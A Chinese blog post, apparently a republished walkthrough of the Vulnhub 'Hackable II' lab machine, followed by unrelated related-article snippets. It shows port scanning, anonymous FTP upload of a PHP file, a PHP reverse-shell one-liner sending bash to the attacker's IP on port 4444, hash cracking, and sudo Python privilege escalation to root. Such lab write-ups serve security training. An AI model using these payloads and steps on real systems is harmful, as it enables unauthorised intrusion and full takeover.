【渗透测试】Vulnhub Hackable II

news/2024/11/16 7:55:38/文章来源:https://www.cnblogs.com/MrSoap/p/18367799

渗透环境

攻击机:   IP: 192.168.216.129(Kali)
靶机:     IP:192.168.216.131
靶机下载地址:https://www.vulnhub.com/entry/hackable-ii,711/

进行渗透

一、 获取端口信息

该虚拟机导入VMware需要在拯救模式中重新配置一下网卡名称,附上教程,不再赘述:https://blog.csdn.net/liver100day/article/details/119109320

进行端口扫描

nmap -O -sV -p- -A 192.168.216.131

img

扫描WEB目录

img

img

打开CALL.html,没有什么发现

img

尝试使用nmap扫描FTP服务,看是否允许匿名登录

nmap --script ftp-anon 192.168.216.131

img

扫描结果表明该主机的FTP服务允许匿名登录,且匿名用户能够访问至少一个文件(CALL.html

登录FTP服务,用户名为anonymous,密码不用输入(直接敲回车)

img

二、 寻找WEB漏洞

查看文件,并下载CALL.html

dir
get CALL.html

img

下载后浏览CALL.html源码并未发现有用信息
尝试上传文件,在攻击机当前路径下写文件test.php,内容如下:

<?=phpinfo();?>

通过FTP上传到目标机器

put test.php

img

上传成功,且在/files/下可以看到该文件,访问该文件,发现可以成功解析

img

接下来的思路就比较清晰了,写一个PHP文件,触发时让目标机器反向连接我们的攻击机来反弹shell。
trojan.php,内容如下:

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.216.129/4444 0>&1'");?>

将其上传

put trojan.php

攻击机启动监听

nc -nlvp 4444

浏览器访问trojan.php,触发木马进行反向连接

img

成功反弹shell

三、 提权

接下来进入/home目录,可以看到一个shrek用户,另外还有一个important.txt

img

读取important.txt

img

提示我们运行/.runme.sh

img

后面的字符串显然是经过md5运算的,我们使用在线md5破解网站进行解码,得到密码:onion

img

创建交互式shell,切换到用户shrek

python3 -c 'import pty;pty.spawn("/bin/bash")'
su shrek

img

常规思路,查看一下具有SUID权限的文件

find / -perm -u=s -type f 2>/dev/null

没有什么发现

img

查看shrek用户可执行的特权命令

sudo -l

img

写一个py文件root.py,内容如下:

echo 'import pty;pty.spawn("/bin/bash")' > root.py

该文件的作用就是打开一个交互式的shell

img

接下来执行

sudo /usr/bin/python3.5 /home/shrek/root.py

这里建议都使用绝对路径,相对路径有时无法成功执行。

这样就用root的身份登录了shell,渗透结束。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/783894.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Elasticsearch怎么导出索引数据至CSV

保存Search 打开kibana 选择需要保存的index 定义好时间区间,需要导出的字段等分享CSV下载CSV导出成功在右下角会出现下载链接

PostgreSQL数据库的安装与部署(Linux)

CentOS安装PostgreSQL版本信息:CentOS版本:CentOS-7-x86_64-Minimal-1810PostgreSQL版本: PostgreSQL 10.10, 64-bit第一部分:PostgresSQL的安装 1、安装rpm文件yum install https://download.postgresql.org/pub/repos/yum/reporpms/EL-7-x86_64/pgdg-redhat-repo-latest.…

2024首届中国Scrum大会成功落幕

这次大会由Scrum.org和Scrum中文网联合主办,以“AI时代下的敏捷”为主题,吸引了来自全国各地的敏捷实践者、企业领导、技术专家和学者,共同探讨敏捷方法在新时代的应用与未来发展。​ ​ 2024年8月17日,首届中国Scrum大会在上海圆满落幕。这次大会由Scrum.org和Scrum中文网…

OV-DINO开放词检测环境安装与推理

​ 引子 开放词检测,之前分享过一篇YOLO-World的文章,感兴趣同学请移步(YOLO-World环境搭建&推理测试_yoloworld 检测-CSDN博客),最近,由中山大学和美团联合提出新的开放域检测方法OV-DINO:基于语言感知选择性融合、统一的开放域检测方法,取得了开放域检测新SOTA!…

jQuery-Mobile-高级教程-全-

jQuery Mobile 高级教程(全)原文:Pro jQuery Mobile 协议:CC BY-NC-SA 4.0零、简介 我们目前正在见证企业和个人构建和分发移动应用的方式的转变。最初的策略是为每个主要平台构建单独的原生应用。然而,团队很快意识到维护多个平台是不可持续的,因为移动团队失去了灵活性…

社区胜于代码,我们在阿帕奇软件基金会亚洲大会聊了聊开源中间件的未来

今年我们在大会第一天的主论坛做了《阿里云中间件持续进化:从分布式应用架构向云原生 AI 应用架构全面升级》的演讲,从云厂商的视角分享了贡献开源、推动社区发展的过程。开发者们在开源社区建立起信任,信任是万事的第一步。 为期 3 天的阿帕奇软件基金会亚洲大会(CoC Asia…

JOOQ-入门手册-全-

JOOQ 入门手册(全)原文:Beginning jOOQ 协议:CC BY-NC-SA 4.0一、欢迎使用 jOOQ 我 15 岁开始从事软件工程(实际上,是严肃的计算机业务),使用 Oracle 8i SQL。是的,从技术上来说,我从小就是个老人了。在我开始上大学之前,玩 SQL* Plus,尝试(并失败)我的第一次 Oracle…

JavaScript-正则表达式入门指南-全-

JavaScript 正则表达式入门指南(全)原文:Introducing Regular Expressions 协议:CC BY-NC-SA 4.0一、正则表达式简介 为了开始介绍正则表达式,我将从一个例子开始。这是一个你已经经历了几百次的问题。当您在线输入客户数据时,许多 web 表单会要求您提供电子邮件地址。为…

基于surging的产品项目-木舟开源了!

一 、 概述因为前段时间电脑坏了,导致代码遗失,踌躇满志马上上线的平台产品付之东流,现在熬夜在写代码希望能尽快推出企业正常使用的平台产品,而这次把代码开源,一是让大家对surging 使用有个深入的了解,二也是开源社区起到监督推动作用,底层的代码基本上已经完成,比如…

SimpleRAG:基于WPF与Semantic Kernel实现的一个简单的RAG应用

SimpleRAG:基于WPF与Semantic Kernel实现的一个简单的RAG应用。SimpleRAG介绍 SimpleRAG是基于WPF与Semantic Kernel实现的一个简单的RAG应用,可用于学习与理解如何使用Semantic Kernel构建RAG应用。 GitHub地址:https://github.com/Ming-jiayou/SimpleRAG 主要功能 AI聊天 …

粒子群算法中对于惯性权重的改进

惯性权重w体现的是粒子继承先前的速度的能力,Shi,Y最先将惯性权重w引入到粒子群算法中,并分析指出一个较大的惯性权值有利于全局搜索,而一个较小的权值则更利于局部搜索。因此,在迭代适应度的同时对惯性权重进行迭代有利于帮助我们寻找最优解 目录一、线性递减惯性权重1.迭…

Git教程2

六、Git的工作区域和文件状态 1、工作区域: (1) 工作区(Working Directory):电脑上可以看到的目录,即实际操作的目录。车间 (2) 暂存区(Staging Area/Index):保存即将提交到Git仓库的修改内容。运输工具 Cache (3) 本地仓库(Local Repository):存储代码和版本信息的主要位…